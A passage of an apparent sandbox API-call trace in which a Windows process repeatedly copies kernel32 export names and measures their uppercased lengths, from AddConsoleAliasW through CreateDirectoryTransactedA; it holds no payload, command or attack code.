out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0081.609] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0081.609] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0081.609] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0081.609] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0081.609] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0081.609] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0081.609] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0081.609] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0081.609] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0081.609] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0081.609] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0081.609] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0081.609] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0081.609] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0081.609] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0081.609] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0081.609] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0081.609] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0081.609] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0081.609] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0081.609] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0081.609] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0081.609] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0081.609] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0081.609] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0081.609] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0081.609] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0081.609] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0081.609] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0081.610] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0081.610] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0081.610] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0081.610] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0081.610] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0081.610] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0081.610] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0081.610] lstrlenA (lpString="BACKUPREAD") returned 10 [0081.610] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0081.610] lstrlenA (lpString="BACKUPSEEK") returned 10 [0081.610] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0081.610] lstrlenA (lpString="BACKUPWRITE") returned 11 [0081.610] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0081.610] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0081.610] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0081.610] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0081.610] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0081.610] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0081.610] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0081.610] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0081.610] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0081.610] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0081.610] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0081.610] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0081.610] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0081.610] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0081.610] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0081.610] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0081.610] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0081.610] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0081.610] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0081.610] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0081.610] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0081.610] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0081.610] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0081.610] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0081.610] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0081.611] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0081.611] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0081.611] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0081.611] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0081.611] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0081.611] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0081.611] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0081.611] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0081.611] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0081.611] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0081.611] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0081.611] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0081.611] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0081.611] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0081.611] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0081.611] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0081.611] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0081.611] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0081.611] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0081.611] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0081.611] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0081.611] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0081.611] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0081.611] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0081.611] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0081.611] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0081.611] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0081.611] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0081.611] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0081.611] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0081.611] lstrlenA (lpString="BEEP") returned 4 [0081.611] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0081.611] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0081.611] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0081.611] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0081.611] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0081.611] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0081.612] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0081.612] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0081.612] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0081.612] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0081.612] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0081.612] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0081.612] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0081.612] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0081.612] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0081.612] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0081.612] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0081.612] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0081.612] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0081.612] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0081.612] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0081.612] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0081.612] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0081.612] lstrlenA (lpString="CANCELIO") returned 8 [0081.612] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0081.612] lstrlenA (lpString="CANCELIOEX") returned 10 [0081.612] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0081.612] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0081.612] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0081.612] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0081.612] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0081.612] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0081.612] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0081.612] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0081.612] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0081.612] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0081.612] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0081.612] lstrlenA (lpString="CHECKELEVATION") returned 14 [0081.612] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0081.612] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0081.612] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0081.612] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0081.612] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0081.613] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0081.613] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0081.613] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0081.613] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0081.613] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0081.613] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0081.613] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0081.613] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0081.613] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0081.613] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0081.613] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0081.613] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0081.613] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0081.613] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0081.613] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0081.613] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0081.613] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0081.613] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0081.613] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0081.613] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0081.613] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0081.613] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0081.613] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0081.613] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0081.613] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0081.613] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0081.613] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0081.613] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0081.613] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0081.613] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0081.613] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0081.613] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0081.613] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0081.613] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0081.613] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0081.613] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0081.613] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0081.614] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0081.614] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0081.614] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0081.614] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0081.614] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0081.614] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0081.614] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0081.614] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0081.614] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0081.614] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0081.614] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0081.614] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0081.614] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0081.614] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0081.614] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0081.614] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0081.614] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0081.614] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0081.614] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0081.614] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0081.614] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0081.614] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0081.614] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0081.614] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0081.614] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0081.614] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0081.614] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0081.614] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0081.614] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0081.614] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0081.614] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0081.614] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0081.614] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0081.614] lstrlenA (lpString="COPYCONTEXT") returned 11 [0081.614] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0081.614] lstrlenA (lpString="COPYFILEA") returned 9 [0081.614] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0081.615] lstrlenA (lpString="COPYFILEEXA") returned 11 [0081.615] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0081.615] lstrlenA (lpString="COPYFILEEXW") returned 11 [0081.615] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0081.615] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0081.615] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0081.615] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0081.615] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0081.615] lstrlenA (lpString="COPYFILEW") returned 9 [0081.615] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0081.615] lstrlenA (lpString="COPYLZFILE") returned 10 [0081.615] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0081.615] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0081.615] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0081.615] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0081.615] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0081.615] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0081.615] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0081.615] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0081.615] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0081.615] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0081.615] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0081.615] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0081.615] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0081.615] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0081.615] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0081.615] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0081.615] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0081.615] 